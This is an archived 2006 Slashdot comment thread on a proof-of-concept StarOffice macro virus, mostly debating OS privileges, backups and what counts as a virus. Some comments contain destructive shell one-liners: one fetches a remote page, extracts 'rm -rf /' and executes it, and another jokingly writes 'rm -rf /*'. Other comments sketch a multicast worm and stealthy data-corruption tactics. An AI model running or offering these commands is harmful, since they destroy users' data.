Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 


Forgot your password?
Close
typodupeerror
×

First StarOffice Virus Sighted 166

Posted by Zonk from the batten-down-the-hatches-maties dept.
Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."
This discussion has been archived. No new comments can be posted.

First StarOffice Virus Sighted More

First StarOffice Virus Sighted

Comments Filter:

  • it's still basically a OS security issue (Score:3, Interesting)

    by yagu ( 721525 ) * <{yayagu} {at} {gmail.com}> on Thursday June 01, 2006 @01:09PM (#15446420) Journal

    First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

    Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

    OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

    Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

    • Re:it's still basically a OS security issue (Score:5, Insightful)

      by Otter ( 3800 ) on Thursday June 01, 2006 @01:22PM (#15446551) Journal
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      • I agree. It's not like if my /home got deleted I'ld be all "well, at least my frozen bubble playing is uninterrupted!"
      • People who don't backup /home every night deserve everything they get.

        • Re:it's still basically a OS security issue (Score:4, Insightful)

          by I'm Don Giovanni ( 598558 ) on Thursday June 01, 2006 @01:56PM (#15446914)
          "People who don't backup /home every night deserve everything they get."

          But even if you did backup every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and you're spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.
          • 1) That's a lot of maybes. Viruses used to pull cute corruption tricks but I haven't seen that behaviour since I was scanning 5-1/4" floppies for boot sector viruses.

            2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.

      • Losing data is always the real problem. (Score:4, Informative)

        by khasim ( 1285 ) <brandioch.conner@gmail.com> on Thursday June 01, 2006 @01:39PM (#15446742)
        If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

        It's always about the security of the data.

        Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

        When all that is in danger is your personal home directory, that's really as good as the OS can be.

        If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.
        • It's always about the security of the data.

          No, as GP said, the security of Infomration is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

          • If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

            Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your accout has Administrator privs), and me on Linux, logged in as "ron", who doesn't has root privs.

            How do we recover?

            You must reinstall WinXP and every application, then all data. Much time (2 weeknight
      • losing $HOME is far more serious than losing system files

        It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely do to practical issues.

        Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an h

        • Re:it's still basically a OS security issue (Score:5, Interesting)

          by chill ( 34294 ) on Thursday June 01, 2006 @02:04PM (#15446997) Journal
          If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

          Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

          I don't, nor do I known anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

          What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

          I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

          I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

            -Charles

          • I used to use cron to make a nightly tarball of my freebsd system's home directory when i ran that as my only os. With two hard drives the process was trivial and fairly unnoticable. Just setup the other drive as a /backup or so. Have cron.daily do a "tar -czf /backup/nightly.tar.gz /home". The details are sketchy as this was years ago, but it worked nicely and could easily have been done weekly instead of daily.

            I did this more to be able to track a change in code incase something happened. This should

          • "I don't, nor do I known anyone that does, back up their /home folder daily."

            My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a seperate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

            It may seem like overkill, but I set t

      • Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.
      • Yeah, we have this discussion all the time, and it drives me crazy. The most important files to the user are his own, but the attacker is much more interested in the system files, to create a botnet, or an IRC server, or whatever.

        More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
        find / -user $ME -perm +x -exec 'rm -i {} ;'

        So even though a virus in userland can do serious damage, it is in a more vulnerable pos
      • > losing $HOME is far more serious than losing system files.

        I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.

        On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz /path/to/backup. Capital damage: 5 minutes to re
        • Most users don't back up though. So while for people who DO, losing ~ isn't horrible, for 95+% of people out there it's the end of the world.

          I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.
      • Losing $HOME, for anyone who cares about their data enough anyway, means restoring from backup (ie, somewhere outside $HOME, even if it's just in another dir). If something outside $HOME is compromised though, then then that user has risked many other systems and users; not just himself. In doing so, he made the 'net more difficult to police, and exposed himself to future troubles. We're all connected now.
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be setup to do an automatic backup for you. Or, if you're really paranoid, could even run StarOffice with its very own user. The tools to protect i
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        That depends on what you keep in $HOME.

        Personally, I keep my data on separate partition mounted on, say, /data or something like that.

        Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dia
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.

    • Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficie

    • I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

      There's plenty of blame to go around, but it points out a general clue: writing secure generalize

      • Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

        I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open

        • <Blockquote>I fault the OS for not giving sufficient granularity of permissions for applications.</blockquote>

          Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless

          • Appropriate "sandbox" security model depends on what an application is supposed to be doing

            Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.

            Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that

            I very much agree.

            P.S. the blockquote tag is n

    • If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
      For me, the system is the least valuable area. I have system cds and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I backup, I only backup my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.
      • Hence the adage, "If you don't have a backup, you don't have data."

        Flood, fire, virus, crash. Really doesn't matter, gone is gone.

        Now whats more dangerous is a virus/script that changes figures and words in documents. Its likely you'll over write your backups and only have corrupt information.

        Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.

    • First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

      Sortof. There is a "security" setting in the preferences that is set to "medium" by default meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.

      Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk bef

  • Missing the best part. (Score:3, Funny)

    by Anonymous Coward on Thursday June 01, 2006 @01:09PM (#15446423)
    What? No link to the "adult content?"

  • Virus!? (Score:5, Funny)

    by Kesch ( 943326 ) on Thursday June 01, 2006 @01:10PM (#15446425)
    It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

    I don't call that a virus, I call it a feature.

    Hopefully the next version will allow you to enter keywords to guide the image downloader.

  • virus? (Score:5, Funny)

    by gEvil (beta) ( 945888 ) on Thursday June 01, 2006 @01:12PM (#15446442)
    It downloads an image file with adult content from the Internet and opens that file in a new document

    That's no virus, that's a productivity tool!

  • A Virus (Score:4, Insightful)

    by CastrTroy ( 595695 ) on Thursday June 01, 2006 @01:12PM (#15446445)
    Is this really a virus. It downloads and displays and image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.

    • No malicious code (Score:3, Insightful)

      by Duds ( 100634 )
      If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.

    • Re:A Virus (Score:4, Insightful)

      by Golias ( 176380 ) on Thursday June 01, 2006 @01:21PM (#15446534)
      A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

      An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.

      That's pretty much all you need to know about Windows and MS-Office.
    • Yes, it shows all the characteristics of a virus - it attaches itself to something & self propagates. It's not a particularly malicious or effective Virus, but it's most certainly a virus.
      • I saw nothing in the article that indicated anything about it being able to propogate.
        • Not in the linked slashdot article, I read this from PC World [pcworld.com] this morning:

          Typically, a virus using macros infects a template, which is then read when opening other documents and infects those also, Schouwenberg said. The Stardust virus is contained in a StarOffice document that uses macros and then infects a global template.

          If a user opens a document infected with Stardust, every StarOffice text document, with a ".sxw" extension, or document template, with a ".stw" extension, will be infected, Schouwenberg

    • Re:A Virus (Score:3, Interesting)

      by packetmon ( 977047 )
      What do you think would happen if someone scripted something into it... Remember its a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

      lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec
      • rm -rf / (which based on the contents of the url you referred to above, I assume is the command you would be invoking with the one-line script) would have no serious effects on a Unix system unless you were running as root. It would have the annoying consequence of removing every file on the system that is owned by the current user, but in all honesty, the responsibility of backing up one's own documents is a small enough scope project that there's no reason people shouldn't be doing that regularly. Unfor
  • ... is do you actually get to see the adult content whilst you get infected? it'd make it so much less annoying.

    I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.

    I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure

  • Learning period (Score:5, Insightful)

    by suv4x4 ( 956391 ) on Thursday June 01, 2006 @01:12PM (#15446452)
    The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

    It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

    Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.
    • Ha. One of these days an offer is going to work, and ill have free pron and FREE MONEY. Then we'll see whose laughing.

  • POC != virus (Score:2, Insightful)

    by Anonymous Coward

    proof of concept is not a virus, sure it could be, but until its in the wild its not really

  • Why go through the trouble? (Score:4, Interesting)

    by MagicM ( 85041 ) on Thursday June 01, 2006 @01:13PM (#15446465)
    If you want to trick someone into viewing an image, why not just embed the image in the document?

    Where is the "proof" (and the "virus") in this "proof of concept virus"?
    • The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.
      • Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.
      • No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or it's links.

  • Bypass mechanism (Score:3, Insightful)

    by 16K Ram Pack ( 690082 ) <(moc.liamg) (ta) (dnomla.mit)> on Thursday June 01, 2006 @01:16PM (#15446498) Homepage
    Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

    I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

    • Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.


      Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.

  • "It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content..
    • "but imagine what could potentially be used in place of the adult content.."

      It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n
    • Hmm, maybe I need to start using Star Office after all.
  • To qualify as a virus, it must be capable of propogating somehow, yet there is nothing in the article that indicates that it could be adapted do this.

    This so-called virus, therefore, is just a trojan.

    • Get used to it. 99.9999% of windows "viruses" are just people dumb enough to go "OOOH LOOK IT SAYS IT'S A SCREENSAVER OF PONNIES!" rather than you know, viruses.
      • But when you execute that screensaver, it emails itself to other dumb windows users. Does this supposed OpenOffice 'virus' have any form of replication, human-assisted or otherwise? Without some form of replication, this is less of a virus than some Unix shell script that reads something like:

        rm -rf /* #This virus uses the honour system. Please email this to all your friends before executing as root

        • True (and I'm so tempted to see if a windows version of your example would actually work) but the point is you'll have to live with all malicious code being called a virus because the great unwashed doesn't know any different.

  • Proof of Concept to infect the planet (Score:5, Interesting)

    by packetmon ( 977047 ) on Thursday June 01, 2006 @01:18PM (#15446513) Homepage
    I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

    In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

    Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

    Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

    • The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

      The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assumin

      • And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability.

        The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.

        If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're
    • Will be strange to see what else comes out of this.

      Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.

  • Erh... no, boss, erh... no, that wasn't me (Score:5, Funny)

    by Opportunist ( 166417 ) on Thursday June 01, 2006 @01:25PM (#15446582)
    Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

    A heartfelt THANK YOU to the autor!

  • Thanks! (Score:3, Funny)

    by Chris Bradshaw ( 933608 ) * on Thursday June 01, 2006 @01:35PM (#15446688)
    "proof-of-concept"

    Cool... Thanks for the idea!

    Respectfully Signed,
    Anonymous Redmond Washington Resident

  • I am sure that this announcment has nothing whatsoever to do with the fact that Kapersky sells virus checkers for Linux.

    Kapersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.

  • OpenOffice too! (Score:3, Informative)

    by levell ( 538346 ) on Thursday June 01, 2006 @01:43PM (#15446772) Homepage
    Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice

  • Yawn (Score:2, Interesting)

    by jofi ( 908156 )
    So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

  • Proof of security (Score:3, Insightful)

    by MobyDisk ( 75490 ) on Thursday June 01, 2006 @01:49PM (#15446833) Homepage
    This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.

  • Is this really a virus? (Score:4, Insightful)

    by xutopia ( 469129 ) on Thursday June 01, 2006 @01:50PM (#15446840) Homepage
    Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?
    • Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

      It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.
    • Well macro viruses from the original definition do exist. Many of them would launch when opening a word file, infect all other word files on the computer and send an attachment to everyone in the address book. Of course these only work on MS Office.

  • hm.. (Score:2, Informative)

    by DoctorDyna ( 828525 )
    It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

    Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.

    • Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.

      OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.

      So its not really a "proof of concept" as regards that particularly capacity at all. The fact that it doesn't show that you can't do it is meaningless, that tells you nothing you didn't know without the so-called "proof of concept".

    • Of course, becuase after all everyone runs StarOffice as a user that has direct write access to their /dev/hdX nodes. Just becuase you are a Windows user that doesnt understand the concept of seperation of privilege becuase MS never bothered, doesnt mean that it doesnt exist. (Er, thats of course assuming you arent running StarOffice on a Windows system, in which case the vulnerability is an MS one anyway)

  • No need to worry (Score:5, Funny)

    by sootman ( 158191 ) on Thursday June 01, 2006 @01:59PM (#15446938) Homepage Journal
    Both StarOffice users have been contacted and were warned to be careful.
    • Graboid (975267) on Thursday June 01, @05:14PM - Modded -1 Flamebait:

      "To both users of Open Office. I'll bet they're shaking in their boots!"


      sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:

      "Both StarOffice users have been contacted and were warned to be careful."


      /. moderation at it's finest there! Surely the second post should also have been flamebait or at least redundant? Oh wait... ones talking about OOo - must protect our open source masters!!

  • That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collabortating with that person to co-produce that document, and you have agreed in advance to use that specific format.

    And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the co

    • And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

      Good luck convincing people to give up Word for TeX, sensible as your idea is.

Slashdot Top Deals

"Here's something to think about: How come you never see a headline like `Psychic Wins Lottery.'" -- Comedian Jay Leno

Close